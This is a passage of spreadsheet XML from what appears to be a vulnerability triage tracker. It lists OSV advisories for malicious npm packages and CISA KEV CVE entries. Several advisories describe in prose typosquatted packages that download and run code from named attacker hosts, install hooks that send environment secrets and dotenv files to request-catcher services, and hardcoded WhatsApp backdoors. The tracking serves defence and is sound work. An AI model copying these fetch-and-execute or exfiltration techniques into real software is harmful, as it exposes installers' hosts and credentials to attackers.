src/index.js, referenced by the package main and executed on require(), performs an HTTP GET to http://tailwindlan.online, writes the response body to a sibling file, and immediately require()s that file, giving the operator of tailwindlan.online arbitrary code execution in the installer's Node.js process at import time. The fetch uses plain HTTP with no integrity or signature check, and the domain is unrelated to the tailwindlabs project. The package name resembles the official @tailwindcss/aspect-ratio plugin, and package.json's repository field points at tailwindlabs/tailwindcss-aspect-ratio to mimic the upstream; the legitimate plugin code is preserved verbatim with the remote-fetch-and-execute block appended to the end of the single minified line.
</t></is></c><c r="T1672" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16049</t></is></c></row><row r="1673"><c r="A1673" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1673" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1673" s="5" t="inlineStr"><is><t>MAL-2026-16050</t></is></c><c r="D1673" s="5" t="inlineStr" /><c r="E1673" s="5" t="inlineStr" /><c r="F1673" s="5" t="inlineStr" /><c r="G1673" s="5" t="inlineStr" /><c r="H1673" s="5" t="inlineStr" /><c r="I1673" s="5" t="inlineStr" /><c r="J1673" s="5" t="inlineStr" /><c r="K1673" s="5" t="inlineStr" /><c r="L1673" s="5" t="inlineStr"><is><t>npm:@aspect-adv-ui/consent-manager</t></is></c><c r="M1673" s="5" t="inlineStr" /><c r="N1673" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1673" s="5" t="inlineStr" /><c r="R1673" s="5" t="inlineStr" /><c r="S1673" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b30b507d6c71f746b0af2d19cbbb85357f15189e7e93118c75b4cb215adc0ece)
@aspect-adv-ui/consent-manager 2.4.1 declares a postinstall hook (`node setup.js`) that fires automatically on every `npm install`. setup.js issues an HTTPS GET to a hardcoded webhook.site inspection endpoint (https://webhook.site/kapper), sending install-event metadata (source IP, TLS/user-agent fingerprint) to an author-controlled third-party collector. The package is advertised as a small GDPR/CCPA consent-bar React component with no native build, no binary, and no legitimate install-time work; the postinstall exists solely to run this beacon. webhook.site is a public request-inspection service commonly used as an anonymous exfiltration/beacon endpoint, and the beacon is not disclosed or opt-in.
</t></is></c><c r="T1673" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16050</t></is></c></row><row r="1674"><c r="A1674" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1674" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1674" s="5" t="inlineStr"><is><t>MAL-2026-16051</t></is></c><c r="D1674" s="5" t="inlineStr" /><c r="E1674" s="5" t="inlineStr" /><c r="F1674" s="5" t="inlineStr" /><c r="G1674" s="5" t="inlineStr" /><c r="H1674" s="5" t="inlineStr" /><c r="I1674" s="5" t="inlineStr" /><c r="J1674" s="5" t="inlineStr" /><c r="K1674" s="5" t="inlineStr" /><c r="L1674" s="5" t="inlineStr"><is><t>npm:@umschool/analytics</t></is></c><c r="M1674" s="5" t="inlineStr" /><c r="N1674" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1674" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1674" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1674" s="5" t="inlineStr" /><c r="R1674" s="5" t="inlineStr" /><c r="S1674" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (da14c2843514d3c9103335648bc81a8bce18fc173b27c2ab39ebe2c6c0abe028)
@umschool/analytics@999.0.4 targets the internal @umschool npm scope with an implausibly high version number to force resolution over any private package of the same name. Its postinstall.js runs on npm install and collects host identity (os.hostname, os.userInfo, process.cwd), reads /etc/hostname, /etc/hosts, /etc/resolv.conf, and /proc/version, filters process.env for credential-shaped keys matching a broad regex (token/secret/key/pass/aws/db/jwt/auth/etc.), and walks parent directories to read.env and config.* files. Each payload is base64-encoded and transmitted via three HTTPS GET beacons to akko.requestcatcher.com, with an additional hex-encoded DNS beacon of hostname+user to the same domain. A README/comment self-labeling the code as a 'HARMLESS PoC' does not change the observed behavior: credential-shaped environment variables, dotenv files, and internal network configuration leave the installer's build host to a third-party request-catcher.
</t></is></c><c r="T1674" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16051</t></is></c></row><row r="1675"><c r="A1675" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1675" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1675" s="5" t="inlineStr"><is><t>MAL-2026-16052</t></is></c><c r="D1675" s="5" t="inlineStr" /><c r="E1675" s="5" t="inlineStr" /><c r="F1675" s="5" t="inlineStr" /><c r="G1675" s="5" t="inlineStr" /><c r="H1675" s="5" t="inlineStr" /><c r="I1675" s="5" t="inlineStr" /><c r="J1675" s="5" t="inlineStr" /><c r="K1675" s="5" t="inlineStr" /><c r="L1675" s="5" t="inlineStr"><is><t>npm:open-item-validator</t></is></c><c r="M1675" s="5" t="inlineStr" /><c r="N1675" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1675" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1675" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1675" s="5" t="inlineStr" /><c r="R1675" s="5" t="inlineStr" /><c r="S1675" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7ba5b55d57f4938bf2494d369d14434bb80ba6f6c712c7f8d89ae773c27dc457)
On require(), index.js spawns a detached, unref'd background Node process (lib/check-items.js) that repeatedly HTTP-GETs a JSON payload from http://itemx.servegame.com:8888/api/x-realtime and executes the returned JavaScript via new Function('require','module', payload.code)(require, moduleObj). The daemon survives the parent process and re-polls the endpoint on a configured interval, so whoever controls that endpoint runs arbitrary Node code on the installer's host on library load and continuously thereafter. The fetch is over plain HTTP to a No-IP dynamic-DNS host (servegame.com) that does not match the publisher's declared homepage (game.spawnrealm.com); a bundled RSA signature check does not alter that the endpoint operator chooses what code runs. README framing as 'signed game code updates' is inconsistent with the shipped generic fetch-and-exec mechanism and the publisher/destination host mismatch.
</t></is></c><c r="T1675" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16052</t></is></c></row><row r="1676"><c r="A1676" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1676" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1676" s="5" t="inlineStr"><is><t>MAL-2026-16056</t></is></c><c r="D1676" s="5" t="inlineStr" /><c r="E1676" s="5" t="inlineStr" /><c r="F1676" s="5" t="inlineStr" /><c r="G1676" s="5" t="inlineStr" /><c r="H1676" s="5" t="inlineStr" /><c r="I1676" s="5" t="inlineStr" /><c r="J1676" s="5" t="inlineStr" /><c r="K1676" s="5" t="inlineStr" /><c r="L1676" s="5" t="inlineStr"><is><t>npm:tailwind-aspect-styles</t></is></c><c r="M1676" s="5" t="inlineStr" /><c r="N1676" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1676" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1676" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1676" s="5" t="inlineStr" /><c r="R1676" s="5" t="inlineStr" /><c r="S1676" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (4d63fe1e50dc7d704732a5e92e95f320fcc3fac45c5a0a223ed278f316c2bb14)
The package's main module (src/index.js) performs an https.get to http://23.27.245.100/index.js over plain HTTP, writes the response to./inout.js in the consumer's working directory, and immediately require()s the written file. The fetch is unpinned, unauthenticated, and served from a bare IP over cleartext, so the operator of that endpoint controls arbitrary JavaScript executed in the Node process that loads this package. The package presents itself as the Tailwind aspect-ratio plugin, with a package.json repository field pointing to tailwindlabs/tailwindcss-aspect-ratio, while the dropper is appended after the legitimate-looking plugin export.
</t></is></c><c r="T1676" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16056</t></is></c></row><row r="1677"><c r="A1677" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1677" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1677" s="5" t="inlineStr"><is><t>MAL-2026-16057</t></is></c><c r="D1677" s="5" t="inlineStr" /><c r="E1677" s="5" t="inlineStr" /><c r="F1677" s="5" t="inlineStr" /><c r="G1677" s="5" t="inlineStr" /><c r="H1677" s="5" t="inlineStr" /><c r="I1677" s="5" t="inlineStr" /><c r="J1677" s="5" t="inlineStr" /><c r="K1677" s="5" t="inlineStr" /><c r="L1677" s="5" t="inlineStr"><is><t>npm:toru-ultimate</t></is></c><c r="M1677" s="5" t="inlineStr" /><c r="N1677" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1677" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1677" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1677" s="5" t="inlineStr" /><c r="R1677" s="5" t="inlineStr" /><c r="S1677" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e6ef8cb6f3ca866b67fa91f2e770c674ddb7d6b110fd671ba98669dc1220510f)
The package's loginViaAPI() function POSTs caller-supplied Facebook email, password, and 2FA Base32 secret to https://minhdong.site/api/v1/facebook/login_ios (a domain unrelated to Facebook, tied to the package's contributor). The response returns Facebook cookies/access_token which are then installed into the caller's session. The README documents login via appState cookies and does not disclose that email/password logins are proxied through minhdong.site. Additionally, package.json declares 'fca-unofficial' as 'github:VangBanLaNhat/fca-unofficial' — an unpinned mutable GitHub reference with no commit SHA. npm install fetches whatever bytes the branch HEAD returns, with no integrity check, and this module is require'd by the bundled E2EE client, so its code runs at import. Whoever controls that GitHub branch controls code delivered to every installer.
</t></is></c><c r="T1677" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16057</t></is></c></row><row r="1678"><c r="A1678" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1678" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1678" s="5" t="inlineStr"><is><t>MAL-2026-16058</t></is></c><c r="D1678" s="5" t="inlineStr" /><c r="E1678" s="5" t="inlineStr" /><c r="F1678" s="5" t="inlineStr" /><c r="G1678" s="5" t="inlineStr" /><c r="H1678" s="5" t="inlineStr" /><c r="I1678" s="5" t="inlineStr" /><c r="J1678" s="5" t="inlineStr" /><c r="K1678" s="5" t="inlineStr" /><c r="L1678" s="5" t="inlineStr"><is><t>npm:vinzz-wcli</t></is></c><c r="M1678" s="5" t="inlineStr" /><c r="N1678" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1678" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1678" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1678" s="5" t="inlineStr" /><c r="R1678" s="5" t="inlineStr" /><c r="S1678" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8dec0212466f7170f1e00ecbfe3f846cbf5d211917c3831a6ee162ca6d44ec10)
vinzz-wcli is a WhatsApp CLI whose main entry (index.js) sets `global.ownerr = "6285185667890@s.whatsapp.net"` and treats any incoming WhatsApp message from that JID as coming from an authorized owner. The `messages.upsert` handler routes messages from owners into `handleCommand`, which dispatches to plugins including `cmd` (which calls `child_process.exec` on the message text) and `eval` (which builds and runs an `AsyncFunction` from the message text). When an installer runs the CLI and pairs their own WhatsApp account, the hardcoded third-party number is silently added as an owner and can send arbitrary shell commands and JavaScript to be executed on the installer's host with the installer's privileges. The tarball also ships a second file, index2.js, which is not the declared main but contains the same hardcoded owner JID and the same messages.upsert -&gt; handleCommand dispatch, providing an equivalent execution path if that file is invoked directly.
</t></is></c><c r="T1678" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16058</t></is></c></row><row r="1679"><c r="A1679" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1679" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1679" s="5" t="inlineStr"><is><t>MAL-2026-16199</t></is></c><c r="D1679" s="5" t="inlineStr" /><c r="E1679" s="5" t="inlineStr" /><c r="F1679" s="5" t="inlineStr" /><c r="G1679" s="5" t="inlineStr" /><c r="H1679" s="5" t="inlineStr" /><c r="I1679" s="5" t="inlineStr" /><c r="J1679" s="5" t="inlineStr" /><c r="K1679" s="5" t="inlineStr" /><c r="L1679" s="5" t="inlineStr"><is><t>npm:plogme</t></is></c><c r="M1679" s="5" t="inlineStr" /><c r="N1679" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1679" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1679" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1679" s="5" t="inlineStr" /><c r="R1679" s="5" t="inlineStr" /><c r="S1679" s="5" t="inlineStr"><is><t>plogme is a renamed fork of the Baileys WhatsApp Web library from the same publisher-controlled family as @crysnovax/baileys (MAL-2026-15917), and versions 1.0.0 through 1.0.3 carry the same forced-follow and fingerprint modules. lib/Utils/channel-policy.js (javascript-obfuscator output, identical to the file in MAL-2026-15917) hardcodes the publisher's WhatsApp newsletter channels 120363423670814885@newsletter and 120363402922206865@newsletter and exports followCrysnovaxTrustedChannels(); lib/Socket/socket.js invokes it from the connection.update handler, so the user's own authenticated WhatsApp account silently follows both channels on every successful connection, with no opt-out. lib/Utils/integrity.js hashes hostname, platform, arch, cpu model and Node version into a machine fingerprint and POSTs it with the package identity to https://bailey.crysnovax.link/api/v1/verify on every socket connect. The obfuscated follow module was decoded, not executed.</t></is></c><c r="T1679" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16199</t></is></c></row><row r="1680"><c r="A1680" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1680" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1680" s="5" t="inlineStr"><is><t>CVE-2026-58704</t></is></c><c r="D1680" s="5" t="n"><v>8.800000000000001</v></c><c r="E1680" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1680" s="5" t="inlineStr"><is><t>CISA-ADP</t></is></c><c r="G1680" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1680" s="5" t="n"><v>0.001</v></c><c r="I1680" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1680" s="5" t="inlineStr" /><c r="K1680" s="5" t="inlineStr"><is><t>google:pixel</t></is></c><c r="L1680" s="5" t="inlineStr" /><c r="M1680" s="5" t="inlineStr" /><c r="N1680" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1680" s="5" t="inlineStr" /><c r="P1680" s="5" t="inlineStr" /><c r="Q1680" s="5" t="inlineStr"><is><t>2026-09-19</t></is></c><c r="R1680" s="5" t="inlineStr"><is><t>CWE-285, CWE-693</t></is></c><c r="S1680" s="5" t="inlineStr"><is><t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t></is></c><c r="T1680" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t></is></c></row><row r="1681"><c r="A1681" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1681" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1681" s="5" t="inlineStr"><is><t>CVE-2026-87491</t></is></c><c r="D1681" s="5" t="n"><v>8.800000000000001</v></c><c r="E1681" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1681" s="5" t="inlineStr"><is><t>CISA-ADP</t></is></c><c r="G1681" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1681" s="5" t="n"><v>0.01</v></c><c r="I1681" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1681" s="5" t="inlineStr" /><c r="K1681" s="5" t="inlineStr"><is><t>google:chromium v8</t></is></c><c r="L1681" s="5" t="inlineStr" /><c r="M1681" s="5" t="inlineStr" /><c r="N1681" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1681" s="5" t="inlineStr" /><c r="P1681" s="5" t="inlineStr" /><c r="Q1681" s="5" t="inlineStr"><is><t>2026-09-23</t></is></c><c r="R1681" s="5" t="inlineStr" /><c r="S1681" s="5" t="inlineStr"><is><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is></c><c r="T1681" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t></is></c></row><row r="1682"><c r="A1682" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1682" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1682" s="5" t="inlineStr"><is><t>CVE-2025-25249</t></is></c><c r="D1682" s="5" t="inlineStr" /><c r="E1682" s="5" t="inlineStr" /><c r="F1682" s="5" t="inlineStr" /><c r="G1682" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1682" s="5" t="n"><v>0.024</v></c><c r="I1682" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1682" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1682" s="5" t="inlineStr"><is><t>fortinet:multiple products</t></is></c><c r="L1682" s="5" t="inlineStr" /><c r="M1682" s="5" t="inlineStr" /><c r="N1682" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1682" s="5" t="inlineStr" /><c r="P1682" s="5" t="inlineStr" /><c r="Q1682" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="R1682" s="5" t="inlineStr" /><c r="S1682" s="5" t="inlineStr"><is><t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t></is></c><c r="T1682" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t></is></c></row><row r="1683"><c r="A1683" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1683" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1683" s="5" t="inlineStr"><is><t>CVE-2026-19490</t></is></c><c r="D1683" s="5" t="inlineStr" /><c r="E1683" s="5" t="inlineStr" /><c r="F1683" s="5" t="inlineStr" /><c r="G1683" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1683" s="5" t="n"><v>0.056</v></c><c r="I1683" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1683" s="5" t="inlineStr"><is><t>citrix</t></is></c><c r="K1683" s="5" t="inlineStr"><is><t>citrix:netscaler</t></is></c><c r="L1683" s="5" t="inlineStr" /><c r="M1683" s="5" t="inlineStr" /><c r="N1683" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1683" s="5" t="inlineStr" /><c r="P1683" s="5" t="inlineStr" /><c r="Q1683" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="R1683" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S1683" s="5" t="inlineStr"><is><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is></c><c r="T1683" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t></is></c></row><row r="1684"><c r="A1684" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1684" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1684" s="5" t="inlineStr"><is><t>CVE-2026-20079</t></is></c><c r="D1684" s="5" t="inlineStr" /><c r="E1684" s="5" t="inlineStr" /><c r="F1684" s="5" t="inlineStr" /><c r="G1684" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1684" s="5" t="n"><v>0.758</v></c><c r="I1684" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1684" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K1684" s="5" t="inlineStr"><is><t>cisco:secure firewall management center (fmc) and security cloud control (scc) firewall management</t></is></c><c r="L1684" s="5" t="inlineStr" /><c r="M1684" s="5" t="inlineStr" /><c r="N1684" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1684" s="5" t="inlineStr" /><c r="P1684" s="5" t="inlineStr" /><c r="Q1684" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="R1684" s="5" t="inlineStr" /><c r="S1684" s="5" t="inlineStr"><is><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is></c><c r="T1684" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t></is></c></row><row r="1685"><c r="A1685" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1685" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1685" s="5" t="inlineStr"><is><t>CVE-2026-42016</t></is></c><c r="D1685" s="5" t="inlineStr" /><c r="E1685" s="5" t="inlineStr" /><c r="F1685" s="5" t="inlineStr" /><c r="G1685" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1685" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1685" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1685" s="5" t="inlineStr" /><c r="K1685" s="5" t="inlineStr"><is><t>jfrog:artifactory</t></is></c><c r="L1685" s="5" t="inlineStr" /><c r="M1685" s="5" t="inlineStr" /><c r="N1685" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1685" s="5" t="inlineStr" /><c r="P1685" s="5" t="inlineStr" /><c r="Q1685" s="5" t="inlineStr"><is><t>2026-09-25</t></is></c><c r="R1685" s="5" t="inlineStr" /><c r="S1685" s="5" t="inlineStr"><is><t>JFrog Artifactory contains an incorrect authorization vulnerability that leads to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t></is></c><c r="T1685" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t></is></c></row><row r="1686"><c r="A1686" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1686" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1686" s="5" t="inlineStr"><is><t>CVE-2026-42018</t></is></c><c r="D1686" s="5" t="inlineStr" /><c r="E1686" s="5" t="inlineStr" /><c r="F1686" s="5" t="inlineStr" /><c r="G1686" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1686" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1686" s="5" t="inlineStr"><is><t>none</t></is></c><c r="J1686" s="5" t="inlineStr" /><c r="K1686" s="5" t="inlineStr"><is><t>jfrog:artifactory</t></is></c><c r="L1686" s="5" t="inlineStr" /><c r="M1686" s="5" t="inlineStr" /><c r="N1686" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1686" s="5" t="inlineStr" /><c r="P1686" s="5" t="inlineStr" /><c r="Q1686" s="5" t="inlineStr"><is><t>2026-09-25</t></is></c><c r="R1686" s="5" t="inlineStr" /><c r="S1686" s="5" t="inlineStr"><is><t>JFrog Artifactory contains an improper authentication vulnerability that could return an internal anonymous-user token to an unauthenticated caller when anonymous access is disabled, potentially exposing sensitive resources.</t></is></c><c r="T1686" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-42018</t></is></c></row><row r="1687"><c r="A1687" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1687" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1687" s="5" t="inlineStr"><is><t>CVE-2026-67277</t></is></c><c r="D1687" s="5" t="inlineStr" /><c r="E1687" s="5" t="inlineStr" /><c r="F1687" s="5" t="inlineStr" /><c r="G1687" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1687" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1687" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1687" s="5" t="inlineStr" /><c r="K1687" s="5" t="inlineStr"><is><t>mikrotik:routeros</t></is></c><c r="L1687" s="5" t="inlineStr" /><c r="M1687" s="5" t="inlineStr" /><c r="N1687" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1687" s="5" t="inlineStr" /><c r="P1687" s="5" t="inlineStr" /><c r="Q1687" s="5" t="inlineStr"><is><t>2026-09-13</t></is></c><c r="R1687" s="5" t="inlineStr" /><c r="S1687" s="5" t="inlineStr"><is><t>MikroTik RouterOS contains a missing authentication for critical function vulnerability which allows kernel memory disclosure and denial of service in the btest service.</t></is></c><c r="T1687" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t></is></c></row><row r="1688"><c r="A1688" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1688" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1688" s="5" t="inlineStr"><is><t>CVE-2026-75650</t></is></c><c r="D1688" s="5" t="inlineStr" /><c r="E1688" s="5" t="inlineStr" /><c r="F1688" s="5" t="inlineStr" /><c r="G1688" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1688" s="5" t="n"><v>0.021</v></c><c r="I1688" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1688" s="5" t="inlineStr" /><c r="K1688" s="5" t="inlineStr"><is><t>adobe:commerce and magento</t></is></c><c r="L1688" s="5" t="inlineStr" /><c r="M1688" s="5" t="inlineStr" /><c r="N1688" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1688" s="5" t="inlineStr" /><c r="P1688" s="5" t="inlineStr" /><c r="Q1688" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="R1688" s="5" t="inlineStr" /><c r="S1688" s="5" t="inlineStr"><is><t>Adobe Commerce and Magento Open Source contain an improper neutralization of special elements used in a template engine vulnerability that could allow an attacker to execute arbitrary code.</t></is></c><c r="T1688" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t></is></c></row><row r="1689"><c r="A1689" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1689" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1689" s="5" t="inlineStr"><is><t>CVE-2026-76460</t></is></c><c r="D1689" s="5" t="inlineStr" /><c r="E1689" s="5" t="inlineStr" /><c r="F1689" s="5" t="inlineStr" /><c r="G1689" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1689" s="5" t="inlineStr" /><c r="I1689" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1689" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K1689" s="5" t="inlineStr"><is><t>cisco:identity services engine</t></is></c><c r="L1689" s="5" t="inlineStr" /><c r="M1689" s="5" t="inlineStr" /><c r="N1689" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1689" s="5" t="inlineStr" /><c r="P1689" s="5" t="inlineStr" /><c r="Q1689" s="5" t="inlineStr"><is><t>2026-09-19</t></is></c><c r="R1689" s="5" t="inlineStr" /><c r="S1689" s="5" t="inlineStr"><is><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is></c><c r="T1689" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t></is></c></row><row r="1690"><c r="A1690" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1690" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1690" s="5" t="inlineStr"><is><t>CVE-2026-76461</t></is></c><c r="D1690" s="5" t="inlineStr" /><c r="E1690" s="5" t="inlineStr" /><c r="F1690" s="5" t="inlineStr" /><c r="G1690" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1690" s="5" t="n"><v>0.02</v></c><c r="I1690" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1690" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K1690" s="5" t="inlineStr"><is><t>cisco:secure email gateway</t></is></c><c r="L1690" s="5" t="inlineStr" /><c r="M1690" s="5" t="inlineStr" /><c r="N1690" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1690" s="5" t="inlineStr" /><c r="P1690" s="5" t="inlineStr" /><c r="Q1690" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="R1690" s="5" t="inlineStr" /><c r="S1690" s="5" t="inlineStr"><is><t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t></is></c><c r="T1690" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t></is></c></row><row r="1691"><c r="A1691" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1691" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1691" s="5" t="inlineStr"><is><t>CVE-2026-85706</t></is></c><c r="D1691" s="5" t="inlineStr" /><c r="E1691" s="5" t="inlineStr" /><c r="F1691" s="5" t="inlineStr" /><c r="G1691" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1691" s="5" t="n"><v>0.12</v></c><c r="I1691" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1691" s="5" t="inlineStr"><is><t>gitlab</t></is></c><c r="K1691" s="5" t="inlineStr"><is><t>gitlab:community edition and enterprise edition</t></is></c><c r="L1691" s="5" t="inlineStr" /><c r="M1691" s="5" t="inlineStr" /><c r="N1691" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1691" s="5" t="inlineStr" /><c r="P1691" s="5" 